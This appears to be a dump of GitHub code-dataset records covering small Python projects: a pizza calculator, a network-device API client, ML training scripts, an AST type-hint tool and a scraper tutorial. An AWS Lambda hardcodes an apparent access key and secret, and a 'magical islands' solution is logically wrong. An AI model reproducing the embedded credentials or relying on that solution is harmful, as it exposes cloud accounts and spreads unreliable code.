visualise:\n pygame.quit()\n\n def countOutcomes(self):\n p1Wins = len([g for g in self.recentOutcomes if g == 1])\n p2Wins = len([g for g in self.recentOutcomes if g == 2])\n draws = len([g for g in self.recentOutcomes if g == -1])\n return p1Wins, p2Wins, draws\n\n\ndef makeMove(agent: IAgent, game, player, epsilon):\n action = agent.getMove(game)\n if np.random.rand() < epsilon:\n actions = game.getActions(player)\n action = actions[np.random.randint(len(actions))]\n agent.s = None\n game.makeMove(player, action)\n","repo_name":"hrjakobsen/MIProject","sub_path":"project/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"33314411268","text":"__author__ = 'Michele Johnson'\r\n# Program Requirements\r\n# A group of high school students are selling pizza and soda during a basketball game to raise fund for a field trip. \r\n# Pizza is $3.50 per slice and soda is $1.25 per cup. Design a program to do the following. \r\n# Ask the user to enter number of cups of soda and number of slices of pizza ordered by the customer. \r\n# The program will calculate and display the total amount due from the customer.\r\n\r\n# Get input from user\r\nNum_Cups = int(input('Enter the number of cups of drink ordered: '))\r\nNum_Slice = int(input('Enter the number of slices of ordered: '))\r\n\r\n# Calculations\r\nSoda_Prc = Num_Cups * 1.25\r\nPizza_Prc = Num_Slice * 3.50\r\nTot_Amt = Soda_Prc + Pizza_Prc\r\n\r\n# Output\r\nprint('\\nDrink total:\\t\\t$' + (format(Soda_Prc, ',.2f')))\r\nprint('Pizza slices total:\\t$' + (format(Pizza_Prc, ',.2f')))\r\nprint('\\nOrder total:\\t\\t$' + (format(Tot_Amt, ',.2f')))\r\n","repo_name":"mischelay2001/WTCSC121","sub_path":"CSC121Lab01_Lab08_Misc/CSC121Lab2Problem4_PizzaSoda.py","file_name":"CSC121Lab2Problem4_PizzaSoda.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"2024815471","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport json\nimport requests\nfrom abc import ABC\nfrom netests.workers.device_api import DeviceAPI\nfrom netests.converters.facts.extreme_vsp.api import (\n _extreme_vsp_facts_api_converter\n)\nfrom netests.converters.lldp.extreme_vsp.api import (\n _extreme_vsp_lldp_api_converter\n)\nfrom netests.constants import FACTS_DATA_HOST_KEY, LLDP_DATA_HOST_KEY\nfrom netests.exceptions.netests_exceptions import NetestsFunctionNotPossible\n\n\nclass ExtremeVSPAPI(DeviceAPI, ABC):\n\n def __init__(\n self,\n task,\n commands,\n vrf_loop,\n converter,\n key_store,\n options={},\n ):\n super().__init__(\n task,\n commands,\n vrf_loop,\n converter,\n key_store,\n options\n )\n\n def exec_call(self, task, command, vrf):\n protocol = self.use_https(task.host.get('secure_api', True))\n login = requests.post(\n url=(\n f\"{protocol}://{task.host.hostname}:{task.host.port}\"\n \"/auth/token/\"\n ),\n headers={\n 'Content-Type': 'application/json',\n },\n data=\"\"\"\n {\n \"username\": \"%s\",\n \"password\": \"%s\"\n }\n \"\"\" % (task.host.username, task.host.password)\n )\n auth_token = json.loads(login.content).get('token')\n\n data = requests.get(\n url=(\n f\"{protocol}://{task.host.hostname}:{task.host.port}\"\n f\"/rest/restconf/data/{command}\"\n ),\n headers={\n 'X-Auth-Token': auth_token,\n }\n )\n\n self.check_status_code(data.status_code)\n return data.content\n\n\nclass BGPExtremeVSPAPI(ExtremeVSPAPI):\n\n def __init__(self, task, options={}):\n raise NetestsFunctionNotPossible(\n \"Extreme_VSP - BGP - API - Not Possible\"\n )\n\n\nclass CDPExtremeVSPAPI(ExtremeVSPAPI):\n\n def __init__(self, task, options={}):\n raise NetestsFunctionNotPossible(\n \"Extreme_VSP - CDP - API - Not Possible\"\n )\n\n\nclass FactsExtremeVSPAPI(ExtremeVSPAPI):\n\n def __init__(self, task, options={}):\n super().__init__(\n task=task,\n commands={\n \"default_vrf\": {\n \"get_infos_sys\": \"openconfig-system:system\",\n \"get_infos_int\": \"openconfig-interfaces:interfaces\"\n }\n },\n vrf_loop=False,\n converter=_extreme_vsp_facts_api_converter,\n key_store=FACTS_DATA_HOST_KEY,\n options=options\n )\n\n\nclass LLDPExtremeVSPAPI(ExtremeVSPAPI):\n\n def __init__(self, task, options={}):\n super().__init__(\n task=task,\n commands={\n \"default_vrf\": {\n \"no_key\": \"openconfig-lldp:lldp/interfaces\"\n }\n },\n vrf_loop=False,\n converter=_extreme_vsp_lldp_api_converter,\n key_store=LLDP_DATA_HOST_KEY,\n options=options\n )\n\n\nclass OSPFExtremeVSPAPI(ExtremeVSPAPI):\n\n def __init__(self, task, options={}):\n raise NetestsFunctionNotPossible(\n \"Extreme_VSP - OSPF - API - Not Possible\"\n )\n\n\nclass VRFExtremeVSPAPI(ExtremeVSPAPI):\n\n def __init__(self, task, options={}):\n raise NetestsFunctionNotPossible(\n \"Extreme_VSP - VRF - API - Not Possible\"\n )\n","repo_name":"Netests/netests","sub_path":"netests/workers/extreme_vsp_api.py","file_name":"extreme_vsp_api.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"57"} +{"seq_id":"72513233457","text":"a, b = map(int, input().split())\r\nAns=0\r\ncnt = 0\r\nfor i in range(a, b + 1):\r\n temp=1\r\n while temp<=i:\r\n if i%temp==0:\r\n cnt=temp\r\n temp*=2\r\n Ans+=cnt\r\nprint(Ans)","repo_name":"tigre911/Algorithm","sub_path":"Python/AO_school/BOJ_1407_2로 몇 번 나누어질까.py","file_name":"BOJ_1407_2로 몇 번 나누어질까.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"41247525300","text":"\"\"\"\nYou are given a two-dimensional matrix, grid, containing only ones and zeroes where zeroes represent\nland and ones represent water. An “island” is a group of one or more contiguous zeroes connected\nfour-directionally (i.e. up, down, left and right). A magical island is an island that is completely\nsurrounded by water on all sides four-directionally. Return the total number of magical islands in\nthe grid.\n\nEx: Given the following grid…\n\ngrid = [\n [1, 1, 1],\n [1, 0, 1],\n [1, 1, 1]\n], return 1.\nEx: Given the following grid…\n\ngrid = [\n [1, 1, 1, 0],\n [1, 0, 1, 0],\n [1, 1, 1, 0]\n], return 1 (the island in the right-most column is not entirely surrounded by water to\nits right for example).\n\"\"\"\n\n\nclass Solution:\n def numMagicalIslands(self, grid):\n # Time O(m*n) Space O(m*n)\n def dfs(i, j):\n if i < 0 or i >= len(grid) or j < 0 or j >= len(grid[0]) or not grid[i][j]:\n return\n grid[i][j] = 0\n dfs(i + 1, j)\n dfs(i - 1, j)\n dfs(i, j + 1)\n dfs(i, j - 1)\n\n count = 0\n for i, v in enumerate(grid):\n for j in range(len(v)):\n if grid[i][j]:\n dfs(i, j)\n count += 1\n return count\n\n\n# Test Cases\nif __name__ == \"__main__\":\n solution = Solution()\n grid = [[1, 1, 1], [1, 0, 1], [1, 1, 1]]\n print(solution.numMagicalIslands(grid)) # 1\n grid = [[1, 1, 1, 0], [1, 0, 1, 0], [1, 1, 1, 0]]\n print(solution.numMagicalIslands(grid)) # 1\n","repo_name":"vishrutkmr7/DailyPracticeProblemsDIP","sub_path":"2023/04 April/db04262023.py","file_name":"db04262023.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"40737353351","text":"import json\nimport boto3\n\n\ndef lambda_handler(event, context):\n '''\n Funcion para extraer la data del evento de inputacion de un objeto en el bucket\n '''\n print(event)\n message_body = json.loads(event['Records'][0]['body'])\n print(message_body)\n file_name = message_body['Records'][0]['s3']['object']['key'] # Separamos el nombre del archivo con la ruta\n bucketName = message_body['Records'][0]['s3']['bucket']['name'] # Separamos el nombre del bucket\n\n file_name = file_name.replace(\"+(1)\", \"\") # eliminamos el \"+(1)\" del nombre del archivo\n print(\"File Name : \",file_name)\n print(\"Bucket Name : \",bucketName)\n glue = boto3.client('glue',\n aws_access_key_id='AKIAXRYNTY2XL6GE3J75',\n aws_secret_access_key='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',\n region_name='us-east-1')\n \n if \"metadata\" in file_name: # Si viene del bucket de metadata activara un etl para metadata \n response = glue.start_job_run(JobName=\"etl-raw-metadata\", Arguments={\"--VAL1\":file_name,\"--VAL2\":bucketName})\n print(\"Lambda Invoke \")\n else: # Si viene del bucket de reviews activara un etl para reviews\n response = glue.start_job_run(JobName=\"etl-raw-reviews\", Arguments={\"--VAL1\":file_name,\"--VAL2\":bucketName})\n print(\"Lambda Invoke \")","repo_name":"marybet/Proyecto-Grupal-Data-Science","sub_path":"arquitectura aws/lambdas/lambda-raw-metadata-ml .py","file_name":"lambda-raw-metadata-ml .py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"20806685988","text":"import sys\n\nwhile 1:\n a = sys.stdin.readline().strip()\n lst = list(map(int, a.split()))\n if a == '0 0 0':\n break \n lst.sort()\n if lst[2] ** 2 == lst[0] ** 2 + lst[1] ** 2:\n print('right')\n else:\n print('wrong')\n","repo_name":"Ulost123/algorithm","sub_path":"class2/4153.py","file_name":"4153.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"16158559665","text":"\"\"\" original author: Armen Aghajanyan \"\"\"\nfrom copy import deepcopy\nfrom operator import index\nfrom os import remove\nimport astunparse\nimport ast\nimport libcst as cst\nfrom typing import Optional\nimport re\n\narrow_re = re.compile(\"\\s*->\\s*\")\n\nclass TypeHintKeepOnlyTargetedFormatPreserving(cst.CSTTransformer):\n # based on https://stackoverflow.com/questions/42733877/remove-type-hints-in-python-source-programmatically\n def __init__(self, arg_types, matching_function, remove_type_imports=False):\n # remove_type_imports is False to match TypeWriter paper\n for arg_type in arg_types:\n assert arg_type in ['return', 'argument']\n self.arg_types = arg_types\n self.remove_type_imports = remove_type_imports\n if remove_type_imports:\n raise NotImplementedError()\n self.matching_function = matching_function\n self.imports = []\n self.matches = []\n\n def leave_FunctionDef(self, node, updated_node):\n if 'return' in self.arg_types and node.returns is not None and self.matching_function(function=node, returns=node.returns):\n is_target = True\n else:\n is_target = False\n updated_node = updated_node.deep_remove(updated_node.returns)\n\n if node.params.params:\n args = []\n for arg in node.params.params:\n if 'argument' in self.arg_types and arg is not None and self.matching_function(function=node, arg=arg):\n self.matches.append({'node': node, 'arg': arg})\n else:\n arg = arg.deep_remove(arg.annotation)\n args.append(arg)\n updated_node = updated_node.with_changes(params=node.params.with_changes(params=args))\n\n if is_target:\n self.matches.append({'original_node': node, 'node': updated_node, 'returns': updated_node.returns})\n return updated_node\n\n def leave_AnnAssign(self, node, updated_node):\n new_node = cst.Assign([cst.AssignTarget(\n target=updated_node.target,\n whitespace_before_equal=cst.SimpleWhitespace(' '),\n whitespace_after_equal=cst.SimpleWhitespace(' '),\n )], updated_node.value)\n return new_node\n\n def leave_Import(self, node, updated_node):\n self.imports.append(node)\n return updated_node\n\n def leave_ImportFrom(self, node, updated_node):\n self.imports.append(node)\n return updated_node\n\nclass TypeHintKeepOnlyTargeted(ast.NodeTransformer):\n # based on https://stackoverflow.com/questions/42733877/remove-type-hints-in-python-source-programmatically\n def __init__(self, arg_types, matching_function, remove_type_imports=False):\n # remove_type_imports is False to match TypeWriter paper\n for arg_type in arg_types:\n assert arg_type in ['return', 'argument']\n self.arg_types = arg_types\n self.remove_type_imports = remove_type_imports\n self.matching_function = matching_function\n self.imports = []\n self.matches = []\n\n def visit_FunctionDef(self, node):\n if 'return' in self.arg_types and node.returns is not None and self.matching_function(function=node, returns=node.returns):\n self.matches.append({'node': node, 'returns': node.returns})\n else:\n node.returns = None\n\n if node.args.args:\n for arg in node.args.args:\n if 'argument' in self.arg_types and arg is not None and self.matching_function(function=node, arg=arg):\n self.matches.append({'node': node, 'arg': arg})\n else:\n arg.annotation = None\n self.generic_visit(node)\n return node\n\n def visit_AnnAssign(self, node):\n if node.value is None:\n return None\n return ast.Assign([node.target], node.value)\n\n def visit_Import(self, node):\n self.imports.append(node)\n if self.remove_type_imports:\n node.names = [n for n in node.names if n.name != 'typing']\n return node if node.names else None\n return node\n\n def visit_ImportFrom(self, node):\n self.imports.append(node)\n if self.remove_type_imports and node.module == 'typing':\n return None\n return node\n\n\nclass TypeHintRemover(ast.NodeTransformer):\n def __init__(self, transform_at_index, preserve_other_types=True, remove_type_imports=True):\n self.transform_at_index = transform_at_index\n self.iter_index = -1\n self.guard_value = None\n self.preserve_other_types = preserve_other_types\n self.remove_type_imports = remove_type_imports\n\n def guard(self, callback):\n self.iter_index += 1\n if self.transform_at_index < 0:\n return\n is_target_node = self.iter_index == self.transform_at_index\n node = callback(preserve_in_original=(is_target_node==self.preserve_other_types))\n if is_target_node:\n self.guard_node = node\n self.guard_value = astunparse.unparse(self.guard_node)\n\n def visit_FunctionDef(self, node):\n def node_empty(preserve_in_original):\n if preserve_in_original:\n to_ret = deepcopy(node.returns)\n else:\n to_ret = node.returns\n node.returns = None\n return to_ret\n\n if node.returns is not None:\n self.guard(node_empty)\n\n if node.args.args:\n for arg in node.args.args:\n def node_empty(preserve_in_original):\n if preserve_in_original:\n to_ret = deepcopy(arg.annotation)\n else:\n to_ret = arg.annotation\n arg.annotation = None\n return to_ret\n if arg.annotation is not None:\n self.guard(node_empty)\n return node\n\n def visit_Import(self, node):\n if self.remove_type_imports:\n node.names = [n for n in node.names if n.name != 'typing']\n return node if node.names else None\n return node\n\n def visit_ImportFrom(self, node):\n if self.remove_type_imports and node.module == 'typing':\n return None\n return node\n\ndef derive_prefix_suffix(original_source: str, removed_value: str):\n index = original_source.find(removed_value, 0)\n while index >= 0:\n yield original_source[:index], original_source[index + len(removed_value):]\n index = original_source.find(removed_value, index + 1)\n\ndef normalize_type(type_, requires_parse=True) -> str:\n # type_: str if requires_parse; else AST\n if requires_parse:\n try:\n parsed = ast.parse(type_)\n except Exception as e:\n print(f\"could not parse type {type_}\")\n print(e)\n return None\n else:\n parsed = type_\n return astunparse.unparse(parsed).strip()\n\ndef get_returns(function_body):\n lines = function_body.splitlines()\n split_lines = [line.strip().split() for line in lines]\n returns = [toks for toks in split_lines if toks and toks[0] == 'return']\n return returns\n\ndef get_non_none_returns(function_body):\n returns = get_returns(function_body)\n return [ret for ret in returns if len(ret) > 1 and ret[1:] != ['None']]\n\ndef create_return_example(source: str, lineno: Optional[int], return_type: Optional[str], imports_and_function=True):\n # pass None for return_type if the type is unknown to not require a type match (@@UNK@@ in the typewriter data)\n try:\n wrapper = cst.MetadataWrapper(cst.parse_module(source))\n except Exception as e:\n print(e)\n return None\n position = wrapper.resolve(cst.metadata.PositionProvider)\n parsed_source = wrapper.module\n def match_with_line_and_type(function, returns):\n function_lineno = position[function].start.line\n return_lineno = position[returns].start.line\n this_return_type = parsed_source.code_for_node(returns.annotation)\n matches_type = (return_type is None) or normalize_type(this_return_type, requires_parse=True) == normalize_type(return_type, requires_parse=True)\n matches_line = (lineno is None) or (lineno == return_lineno) or (lineno == function_lineno) or (lineno == function_lineno-2) or (lineno == function_lineno-1)\n return matches_type and matches_line\n processor = TypeHintKeepOnlyTargetedFormatPreserving(['return'], match_with_line_and_type)\n # remove the type annotations, except for the target\n try:\n transformed_parsed_source = parsed_source.visit(processor)\n except Exception as e:\n # visit has trouble with e.g. assignments where the value is an unimported class\n print(e)\n return None\n\n if len(processor.matches) != 1:\n # print(f\"{len(processor.matches)} matches found!\")\n # print(f\"return_type: {return_type}\")\n # print('\\n'.join(source.splitlines()[lineno-1:lineno+2]))\n return None\n\n return_type_from_source = transformed_parsed_source.code_for_node(processor.matches[0]['returns'].annotation)\n\n return_type_from_source = normalize_type(return_type_from_source)\n \n if imports_and_function:\n extra_left = [transformed_parsed_source.code_for_node(node) for node in processor.imports]\n try:\n to_split = transformed_parsed_source.code_for_node(processor.matches[0]['node'])\n except Exception as e:\n print(e)\n return None\n else:\n extra_left = []\n try:\n to_split = transformed_parsed_source.code\n except Exception as e:\n # .code has trouble with e.g. assignments of boolean values created by an equality test\n print(e)\n return None\n \n to_split = arrow_re.sub(\" -> \", to_split)\n pairs = list(derive_prefix_suffix(to_split, f\" -> {return_type_from_source}\"))\n if len(pairs) != 1:\n return None\n assert len(pairs) == 1\n left, right = pairs[0]\n return {\n 'extra_left': extra_left,\n 'left': left + ' -> ',\n 'right': right,\n 'return_type_from_source': return_type_from_source,\n }\n\n\nif __name__ == \"__main__\":\n source = \"\"\"\nimport typing\nfrom typing import Dict, T, Callable\nfrom typing import List\n\ndef foo(bar: Dict[T, List[T]],\n baz: Callable[[T], int] = lambda x: (x+3)/7,\n **kwargs):\n a: int = True\n pass\n\"\"\"\n\n # with open('/tmp/source.py', 'r') as f:\n # source = f.read()\n\n parsed_source = ast.parse(source)\n clean_source = astunparse.unparse(TypeHintRemover(len(source)).visit(ast.parse(source)))\n unique = set()\n for i in range(len(source)):\n transformer = TypeHintRemover(i)\n transformed_ast = transformer.visit(parsed_source)\n transformed = astunparse.unparse(transformed_ast)\n unique.add((transformed, transformer.guard_value))\n infills = []\n for (removed_source, removed_value) in unique:\n print(removed_source)\n print(removed_value)\n if removed_value is None:\n continue\n for left, right in derive_prefix_suffix(clean_source, removed_value.strip()):\n print(\"left:\", left)\n print(\"right:\", right)\n print(\"removed:\", removed_value)\n print()\n infills.append((left,right,removed_value))\n print()\n #pprint(infills)\n","repo_name":"Eric-Wallace/codex","sub_path":"type_hints.py","file_name":"type_hints.py","file_ext":"py","file_size_in_byte":11410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"14092010342","text":"import os\n\nimport torch\nimport torch.distributed as dist\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom timm.models.vision_transformer import _create_vision_transformer\nfrom tqdm import tqdm\nfrom torchvision import transforms\nimport torchvision\n\nimport colossalai\nfrom colossalai.core import global_context as gpc\nfrom colossalai.logging import disable_existing_loggers, get_dist_logger\nfrom colossalai.nn import CrossEntropyLoss\nfrom colossalai.nn._ops import *\nfrom colossalai.nn.lr_scheduler import CosineAnnealingWarmupLR\nfrom colossalai.nn.optimizer import HybridAdam\nfrom colossalai.nn.parallel.data_parallel import ColoDDP\nfrom colossalai.tensor import ComputePattern, ComputeSpec, DistSpecManager, ProcessGroup, ShardSpec\nfrom colossalai.utils import get_current_device\nfrom colossalai.utils.model.colo_init_context import ColoInitContext\n\nfrom utils import *\n\n\ndef train_vit():\n\n parser = colossalai.get_default_parser()\n parser.add_argument('--resume_from', default=False, action='store_true')\n\n args = parser.parse_args()\n colossalai.launch_from_torch(config=args.config)\n use_ddp = gpc.config.USE_DDP\n\n disable_existing_loggers()\n\n logger = get_dist_logger()\n if hasattr(gpc.config, 'LOG_PATH'):\n if gpc.get_global_rank() == 0:\n log_path = gpc.config.LOG_PATH\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n logger.log_to_file(log_path)\n\n logger.info('Build data loader', ranks=[0])\n data_transform = {\n \"train\": transforms.Compose([transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n AddGaussianNoise(std=0.01),\n transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])]),\n \"val\": transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])])}\n trainset = torchvision.datasets.CIFAR10(root = './data',train=True,download=True,transform=data_transform[\"train\"])\n train_dataloader = torch.utils.data.DataLoader(trainset, batch_size=gpc.config.BATCH_SIZE, shuffle=True,num_workers=gpc.config.NW)\n testset = torchvision.datasets.CIFAR10(root='./data', train=False,\n download=True, transform=data_transform[\"val\"])\n test_dataloader = torch.utils.data.DataLoader(testset, batch_size=gpc.config.BATCH_SIZE,\n shuffle=True, num_workers=gpc.config.NW)\n\n logger.info('Build model', ranks=[0])\n\n model_kwargs = dict(img_size=gpc.config.IMG_SIZE,\n patch_size=gpc.config.PATCH_SIZE,\n embed_dim=gpc.config.HIDDEN_SIZE,\n depth=gpc.config.DEPTH,\n num_heads=gpc.config.NUM_HEADS,\n mlp_ratio=gpc.config.MLP_RATIO,\n num_classes=gpc.config.NUM_CLASSES,\n drop_rate=0.1,\n attn_drop_rate=0.1,\n weight_init='jax')\n\n with ColoInitContext(device=get_current_device()):\n model = _create_vision_transformer('vit_small_patch16_224', pretrained=True, **model_kwargs)\n init_spec_func(model, gpc.config.TP_TYPE)\n\n world_size = torch.distributed.get_world_size()\n model = ColoDDP(module=model, process_group=ProcessGroup(tp_degree=world_size))\n logger.info('Build criterion, optimizer, lr_scheduler', ranks=[0])\n optimizer = HybridAdam(model.parameters(), lr=gpc.config.LEARNING_RATE, weight_decay=gpc.config.WEIGHT_DECAY)\n\n criterion = CrossEntropyLoss()\n lr_scheduler = CosineAnnealingWarmupLR(optimizer=optimizer,\n total_steps=gpc.config.NUM_EPOCHS,\n warmup_steps=gpc.config.WARMUP_EPOCHS)\n\n start_epoch = 0\n if args.resume_from:\n load_model = torch.load(args.resume_from + '_model.pth')\n start_epoch = load_model['epoch']\n model.load_state_dict(load_model['model'])\n load_optim = torch.load(args.resume_from + '_optim_rank_{}.pth'.format(dist.get_rank()))\n optimizer.load_state_dict(load_optim['optim'])\n\n for epoch in range(start_epoch, gpc.config.NUM_EPOCHS):\n model.train()\n for index, (x, y) in tqdm(enumerate(train_dataloader), total=len(train_dataloader), leave=False):\n x, y = x.cuda(), y.cuda()\n output = model(x)\n loss = criterion(output, y)\n loss = loss / gpc.config.gradient_accumulation\n if use_ddp:\n model.backward(loss)\n else:\n loss.backward()\n if (index + 1) % gpc.config.gradient_accumulation == 0:\n optimizer.step()\n if use_ddp:\n model.zero_grad()\n else:\n optimizer.zero_grad()\n\n logger.info(\n f\"Finish Train Epoch [{epoch+1}/{gpc.config.NUM_EPOCHS}] loss: {loss.item():.3f} lr: {optimizer.state_dict()['param_groups'][0]['lr']}\",\n ranks=[0])\n\n model.eval()\n test_loss = 0\n correct = 0\n test_sum = 0\n with torch.no_grad():\n for index, (x, y) in tqdm(enumerate(test_dataloader), total=len(test_dataloader), leave=False):\n x, y = x.cuda(), y.cuda()\n output = model(x)\n test_loss += F.cross_entropy(output, y, reduction='sum').item()\n pred = output.argmax(dim=1, keepdim=True)\n correct += pred.eq(y.view_as(pred)).sum().item()\n test_sum += y.size(0)\n\n test_loss /= test_sum\n logger.info(\n f\"Finish Test Epoch [{epoch+1}/{gpc.config.NUM_EPOCHS}] loss: {test_loss:.3f} Accuracy: [{correct}/{test_sum}]({correct/test_sum:.3f})\",\n ranks=[0])\n\n lr_scheduler.step()\n\n\nif __name__ == '__main__':\n train_vit()","repo_name":"Kaiwen-Tang/CS6101","sub_path":"train_vit.py","file_name":"train_vit.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"11750957140","text":"# 100% O(n^2) time complexity\ndef twoNumberSum1(array, targetSum):\n tracking_array = []\n for i in array:\n for j in array:\n if j + i == targetSum and j != i:\n tracking_array.append([i, j])\n\n for x in tracking_array:\n x.sort()\n result = [list(t) for t in set(tuple(x) for x in tracking_array)]\n return result[0] if len(result) >= 1 else result\n\n\n# 100% O(n) time complexity\ndef twoNumberSum2(array, targetSum):\n if len(array) == 0 or len(array) == 1:\n return []\n dictionary = {}\n for i in range(len(array)):\n second_number = targetSum - array[i]\n if second_number in dictionary.keys():\n second_index = array.index(second_number)\n if i != second_index:\n return sorted([array[i], array[second_index]])\n dictionary.update({array[i]: i})\n return []\n","repo_name":"Alexandru-S/Code_Solutions","sub_path":"two_number_sum/solutions.py","file_name":"solutions.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"14623546200","text":"import sys\nimport csv\nimport re\n\ncategories_file = sys.argv[1]\nexpenses_file = sys.argv[2]\nexisting_categories = dict()\nnew_categories = dict()\n\nwith open(categories_file) as categories_csv:\n categories_reader = csv.reader(categories_csv, delimiter=';', quotechar='\"')\n next(categories_reader) # Skips header\n for row in categories_reader:\n existing_categories[row[0]] = 1\nwith open(expenses_file, encoding='iso-8859-1') as expenses_csv:\n expenses_reader = csv.reader(expenses_csv, delimiter=';', quotechar='\"')\n for row in expenses_reader:\n if len(row) >= 5 and re.match('.\\d*\\.?\\d+,\\d+', row[5]):\n new_categories[row[2]] = 1\nf = open(categories_file, 'a')\nnew_categories_count = 0\nfor new_category in new_categories.keys():\n if new_category and new_category not in existing_categories:\n new_categories_count += 1\n f.write('{};;\\n'.format(new_category))\nprint('Added {} categories to {}'.format(new_categories_count, categories_file))\n","repo_name":"michelebraidotti/scripts","sub_path":"expenses_analysis/expense_categotries_update.py","file_name":"expense_categotries_update.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"17907414881","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis software is the implementation of the following article submitted to TPAMI:\n\tCastellini A., Masillo F., Azzalini D., Amigoni F., Farinelli A., Adversarial Data Augmentation for HMM-based Anomaly Detection\nIn this stage, the software is intended for reviewers' use only.\n\"\"\"\n\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nargs_list = sys.argv\nif \"--result_dir\" in args_list:\n\tfolder = sys.argv[args_list.index(\"--result_dir\")+1]\nelse:\n\tprint(\"Mandatory parameter --result_dir not found please check input parameters\")\n\tsys.exit()\nif \"--adv_method\" in args_list:\n\tadv_method = sys.argv[args_list.index(\"--adv_method\")+1]\nelse:\n\tprint(\"Mandatory parameter --adv_method not found please check input parameterss\")\n\tsys.exit()\nif \"--train_sizes\" in args_list:\n\ttrain_sizes = sys.argv[args_list.index(\"--train_sizes\")+1].split(',')\nelse:\n\tprint(\"Mandatory parameter --train_sizes not found please check input parameters\")\n\tsys.exit() \n\n\n\ntrain_sizes = [int(t) for t in train_sizes]\nf1s = [] * len(train_sizes)\n\n\nfor train_size in sorted(train_sizes):\n f1 = []\n data = pd.read_csv(f\"{folder}/f1_scores_train_size_{train_size}_adv_method_{adv_method}.csv\")\n for col in data.columns:\n f1.append(np.nanmean(data[col]))\n f1s.append(f1)\n\nplt.figure()\nfor i, col in enumerate(data.columns):\n to_plot = []\n for j, train_size in enumerate(sorted(train_sizes)):\n to_plot.append(f1s[j][i])\n if len(train_sizes) == 1:\n plt.scatter(train_sizes, to_plot, label=col)\n else:\n plt.plot(to_plot, label=col)\n\nplt.title('F1 score')\nif len(train_sizes) != 1:\n plt.xticks(range(len(train_sizes)), train_sizes)\nplt.legend()\nplt.tight_layout()\nplt.savefig(f'{folder}/plot_{adv_method}-AUG.pdf')\n","repo_name":"HHADAdversarialAugmentation/adv_data_aug_hmm","sub_path":"plot_f1.py","file_name":"plot_f1.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"22844936647","text":"'''\n提取某一页的所有段子\n获取了HTML代码之后,我们开始分析怎样获取某一页的所有段子。\n\n首先我们审查元素看一下,按浏览器的F12\n\n我们可以看到,每一个段子都是<div class=”article block untagged mb15″ id=”…”>…</div>包裹的内容。\n\n��在我们想获取发布人,发布日期,段子内容,以及点赞的个数。不过另外注意的是,段子有些是带图片的,如果我们想在控制台显示图片是不现实的,所以我们直接把带有图片的段子给它剔除掉,只保存仅含文本的段子。\n\n所以我们加入如下正则表达式来匹配一下,用到的方法是 re.findall 是找寻所有匹配的内容。方法的用法详情可以看前面说的正则表达式的介绍。\n\n好,我们的正则表达式匹配语句书写如下,在原来的基础上追加如下代码\n\n\n'''\nimport urllib.request as r\nimport urllib.parse as p\nimport re\n\npage = 1\nurl = 'http://www.qiushibaike.com/hot/page/' + str(page)\nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36'\nheaders = { 'User-Agent' : user_agent }\ntry:\n request = r.Request(url=url,headers = headers)\n response = r.urlopen(request)\n res=response.read()\n# print(res.decode(encoding='utf-8'))\nexcept r.URLError as e:\n if hasattr(e, \"code\"):\n print(e.code)\n if hasattr(e, \"reason\"):\n print(e.reason)\n#运行终于正常了,打印出了第一页的HTML代码\n#追加正则表达\ncontent = res.decode('utf-8')\npattern = re.compile('<div.*?author clearfix\">.*?<h2>(.*?)</h2>.*?<span>(.*?)'+\n '</span>.*?<div class=\"stats.*?class=\"number\">(.*?)</i>',re.S)\nitems = re.findall(pattern,content)\nfor item in items:\n print(item[0],item[1],item[2])\n\n#1).*? 是一个固定的搭配,.和*代表可以匹配任意无限多个字符,加上?表示使用非贪婪模式进行匹配,也就是我们会尽可能短地做匹配,以后我们还会大量用到 .*? 的搭配。\n\n#2)(.*?)代表一个分组,在这个正则表达式中我们匹配了三个分组,在后面的遍历item中,item[0]就代表第一个(.*?)所指代的内容,item[1]就代表第二个(.*?)所指代的内容,以此类推。\n\n#3)re.S 标志代表在匹配时为点任意匹配模式,点 . 也可以代表换行符。\n\n#这样我们就获取了发布人,发布内容,以及点赞数。\n#带图片的段子进行过滤\n#for item in items:\n# haveImg = re.search(\"img\",item[3])\n# if not haveImg:\n# print 